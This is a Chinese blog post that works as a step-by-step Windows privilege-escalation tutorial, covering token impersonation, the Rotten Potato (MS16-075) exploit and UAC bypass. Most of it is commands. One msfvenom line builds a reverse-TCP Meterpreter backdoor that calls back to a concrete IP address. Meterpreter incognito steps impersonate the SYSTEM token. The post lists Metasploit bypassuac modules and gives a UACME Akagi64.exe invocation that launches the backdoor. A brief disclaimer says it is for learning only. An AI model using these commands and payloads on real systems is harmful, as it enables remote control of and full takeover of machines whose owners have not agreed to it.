windows本地提权--令牌窃取&烂土豆&UAC

于 2024-04-23 16:06:51 发布
阅读量405 收藏 6
点赞数 6
分类专栏: # 权限提升 文章标签: windows 网络 安全 服务器 网络攻击模型 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138126665
版权
文章介绍了在Windows系统中利用Meterpreter后门、MS16-075漏洞、令牌窃取以及如何通过MSF模块和UACME项目绕过用户账户控制进行提权的方法。重点讲述了如何通过BypassUAC技术和反编译的Akagi64.exe工具来执行命令。
摘要由CSDN通过智能技术生成

免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...

目录

一.令牌窃取

操作:

1-生成-->上传后门后,让msf上线

2-执行命令

二.烂土豆(MS16-075)

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

三.UAC(用户账户控制)

1-MSF模块提权

2-UACME 项目(yyds)

本地--->system

一.令牌窃取

令牌窃取:  Win2008 Win2012

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击.

操作:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.105.154.133 LPORT=8888 -f exe -o msf.exe
getuid
use incognito

list_tokens -u	#展示令牌

impersonate_token "NT AUTHORITY\SYSTEM"	#窃取令牌

1-生成-->上传后门后,让msf上线

2-执行命令

二.烂土豆(MS16-075)

---与令牌窃取差不多. 

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

getuid       
 
pwd        
 
cd C://        //到烂土豆目录下.
 
execute -cH -f ./potato.exe        //执行烂土豆
 
use incognito        //窃取令牌模块
 
list_tokens -u       //查看可以窃取权限
 
impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限

三.UAC(用户账户控制)

快速定位命令: msconfig

为了远程执行目标的 exe 或者 bat 可执行文件绕过此安全机制,以此叫 BypassUAC .

绕过项目:MSF 内置,Powershell 渗透框架,UACME 项目(推荐).

开启 UAC 和 未开启 UAC 时,MSF 默认 getsystem 提权影响(进程注入).

1-MSF模块提权

----先让MSF上线.

msf先上线
getuid
getsystem		#遇到UAC就不行了.-->用模块

search uac

uac没开---getsystem直接成功

uac开了	(win7)
use exploit/windows/local/bypassuac
--成功

uac开了(默认状态)	(win10) 
上面的模块就不行了
use exploit/windows/local/ask
--这个模块需要靶机点击是才能成功.(条件苛刻)

自动化:
use exploit/windows/local/bypassuac_sluihijack  
--成功

use exploit/windows/local/bypassuac_silentcleanup  
--成功

2-UACME 项目(yyds)

GitHub - hfiref0x/UACME: Defeating Windows User Account Control

---该项目需要反编译一下,然后再上传运行.

--先让MSF上线 

#反编译之后--->上传Akagi64.exe-->命令执行

Akagi64.exe 41 msf.exe	(前面为反编译好的软件,中间值为模式的选择,最后为后门路径)(76种)
Akagi64.exe 编号 调用执行
#原理:以UAC项目运行后门,进行绕过

getuid

getsystem

金灰
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
48-4 内网渗透 - Rotten Potato(土豆) 提权
weixin_43263566的博客
06-21 281
在渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升。
权限提升之利用相关服务提权(土豆系列).pdf
10-21
关于土豆系列提权的合集
提权小神器-JuicyPotato多种应用场景详解
J0o1ey Blog
03-25 7511
0X00-Juicy-Potato简介 Juicy Potato江湖人称土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows S...
Windows提权土豆
最新发布
2401_84275261的博客
04-18 599
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
土豆 (ms16-075) 提权方法
good good study
03-11 9968
所谓的土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
提权 - Windows 土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1224
提权 - Windows 土豆/ dll劫持 /服务权限
土豆Juicypotato提权原理和利用
god_Zeo的安全博客
05-25 1万+
0x00 Potato(土豆提权的原理: 所谓的土豆提权就是俗称的MS16-075 可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。 一、简单的原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继
权限提升:土豆 || DLL 劫持.
网络安全领域___专研者.
05-01 1204
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权
pyinstaller打包单文件时--uac-admin选项不起作用怎么办
09-17
在Python开发过程中,有时我们需要将Python脚本打包成可独立运行的Windows executable(exe)文件,以便于分发和执行。PyInstaller是一个流行的工具,它能够实现这一目标。然而,在某些场景下,我们可能需要打包的...
VB-UAC-BYPASS.rar_VB 提权_bypass uac_vb uac_提权_模拟CMD
09-22
标签中的关键词进一步强调了这个主题,"vb_提权"表示这是VB的权限提升技术,"bypass_uac"指的是绕过UAC,"vb_uac"表明这是VB与UAC交互的方式,而"模拟cmd"则再次提及了欺骗用户的方法。 在压缩包内的"UAC欺骗"文件...
windows&linux;提权总结
04-24
- 熟悉权限提升的常见方法,包括Windows中的UAC绕过、服务配置错误、计划任务等。 - 对Linux系统中SUID/SGID位的滥用、内核漏洞、配置文件错误等技术的掌握。 需要注意的是,这些信息和方法不应被用于非法目的。在...
土豆提权神器(改进版)
04-15
本工具从原版土豆工具里进行修改以避免每次在使用时都需要输入复杂的命令,使用方法如下: 假如操作系统是windows 2008 R2,则在命令提示符中,首先切换到该工具所在的目录,然后输入JuicyPotato.exe -p "这里粘贴想要执行的系统命令" 即可获得system权限(该工具在git hubu上)。具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在虚拟机中使用。
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
UAC提权与降权、避免弹窗出现(源码)
08-11
综上所述,UACWindows系统安全的重要组成部分,理解和掌握UAC提权与降权的原理及实践,对于系统管理员、开发者和安全研究人员来说都至关重要。而提供的源码资源则提供了实践经验,可以帮助学习者深入了解这一领域...
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 537
提权 - Windows 令牌窃取/进程注入提权
windows提权土豆(RottenPotato)及Juicy Potato提权
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2264
令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
土豆(JuicyPotato)提权
热门推荐
Shanfenglan's blog
11-18 9万+
CATALOG1.前言2.原理2.1前置知识2.2juicypotato实现流程3.实现3.1提权结果3.2实现步骤3.2.1先使用powershell脚本找到可用的CLSID3.2.2再使用bat文件确定能利用的CLSID3.2.3使用juicypotato进行利用4.防御方法5.参考文章 1.前言 很有名的一个提权工具,今天对其做一个小小的使用总结。 2.原理 2.1前置知识 首先我们要知道: 使用DCOM的时候,如果以服务方式远程连接,那么为system权限,例如BITS服务。 使用DCOM可以通过
土豆提权复现
longwanlian的博客
10-16 303
值得注意的是,土豆方法只适用于符合特定条件的Windows版本和配置,例如使用旧版的Windows Server操作系统以及较早的Windows 10版本。根据微软的修补程序,土豆漏洞已经在最新版本的Windows中被修复。本次为复现提权的实验,所以就对传递shell之间的细节忽略,拖拽shell上传目标靶机,在双击文件,笔记是一边复现一边写的。现在改用windows版本的msf倒是成功进入meterpreter后渗透模块。然后依旧没有成功,休息了一下,晚上看的时候就成功了,有时候还怪玄学的。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值